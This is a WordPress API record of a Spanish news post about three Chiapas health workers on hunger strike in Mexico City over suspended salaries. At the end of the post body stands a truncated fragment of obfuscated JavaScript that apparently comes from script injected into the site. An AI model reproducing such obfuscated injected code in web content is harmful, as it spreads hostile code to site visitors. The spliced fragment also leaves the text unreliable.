{"id":623,"date":"2022-03-16T04:33:00","date_gmt":"2022-03-16T04:33:00","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=623"},"modified":"2022-03-16T04:33:01","modified_gmt":"2022-03-16T04:33:01","slug":"trabajadoras-de-salud-se-van-a-huelga","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=623","title":{"rendered":"Trabajadoras de salud se van a huelga"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-15-at-4.14.18-PM-1024x1024.jpeg\" alt=\"\" class=\"wp-image-624\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-15-at-4.14.18-PM-1024x1024.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-15-at-4.14.18-PM-300x300.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-15-at-4.14.18-PM-150x150.jpeg 150w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-15-at-4.14.18-PM-768x768.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/03\/WhatsApp-Image-2022-03-15-at-4.14.18-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>15 de Marzo del 2022. San Crist\u00f3bal de Las Casas.- Tres trabajadoras de la Secretar\u00eda de Salud de Chiapas iniciaron una huelga de hambre desde el pasado 11 de marzo en la Ciudad de M\u00e9xico, donde se encuentran en plant\u00f3n pidiendo audiencia con autoridades federales y el Presidente Andr\u00e9s Manuel L\u00f3pez Obrador, y exponer los problemas laborales que enfrentan como Secci\u00f3n 03 del Sindicato.<\/p>\n\n\n\n<p>En entrevista v\u00eda telef\u00f3nica con Gabriela Mayan\u00edn L\u00f3pez Cruz, enfermera de la Secretar\u00eda de Salud de Chiapas e integrante del Sindicato de la Secci\u00f3n 03 del estado, dijo que el d\u00eda 11 de marzo a las 12 horas ella y dos compa\u00f1eras m\u00e1s se pusieron en huelga de hambre, \u201chasta ahorita han venido representantes de gobierno pero no hay ninguna respuesta positiva a nuestras peticiones\u201d.<\/p>\n\n\n\n<p>Se\u00f1al\u00f3 que el motivo de la huelga de hambre es porque en Chiapas, el secretario de Salud Jos\u00e9 Manuel Cruz Castellanos, suspendi\u00f3 sus salarios desde mes de abril de 2021, \u201cposteriormente empez\u00f3 a acechar a los compa\u00f1eros de esta misma organizaci\u00f3n sindical, en el mes de febrero del a\u00f1o en curso empezaron a levantar actas administrativas a los mismos compa\u00f1eros de esta organizaci\u00f3n\u201d.<\/p>\n\n\n\n<p>\u201cComo el secretario de Salud no nos escucha las peticiones administrativas, para que nos diga cu\u00e1l es la causa motivo para ser suspendidos de nuestro salario, por eso venimos a la Ciudad de M\u00e9xico y plantarnos ac\u00e1 para que el gobierno federal y Andr\u00e9s Manuel L\u00f3pez Obrador nos escuche y nos resuelva estas peticiones que hacemos\u201d.<\/p>\n\n\n\n<p>Asimismo, dijo que son 23 compa\u00f1eros afectados de la misma estructura del comit\u00e9 del sindicato 03, \u201csomos tres en huelga de hambre, su servidora, Claudia Mart\u00ednez Camacho, Eloida P\u00e9rez L\u00e1zaro, vamos 4 d\u00edas, el domingo vino una ambulancia ERUM nos vino a valorar y no se han hecho presentes\u201d.<\/p>\n\n\n\n<p>\u201cLos compa\u00f1eros del sindicato estamos la mitad aqu\u00ed y la mitad en Tuxtla Guti\u00e9rrez. No vamos a concluir la huelga de hambre hasta que se resuelvan nuestras peticiones, no hay temor porque nos estamos muriendo en casa, podemos morir ac\u00e1 en el Z\u00f3calo y se pueden integrar m\u00e1s a la huelga de hambre, nos interesa que nos solucionen ahora\u201d, finaliz\u00f3<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez 15 de Marzo del 2022. San Crist\u00f3bal de Las Casas.- Tres trabajadoras de la Secretar\u00eda de Salud de Chiapas iniciaron una huelga de hambre desde el pasado 11 de marzo en la Ciudad de M\u00e9xico, donde se encuentran en plant\u00f3n pidiendo audiencia con autoridades federales y el Presidente Andr\u00e9s Manuel L\u00f3pez Obrador, y &hellip;<\/p>\n","protected":false},"author":2,"featured_media":624,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-623","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/623","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=623"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/623\/revisions"}],"predecessor-version":[{"id":625,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/623\/revisions\/625"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/624"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=623"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=623"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=623"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}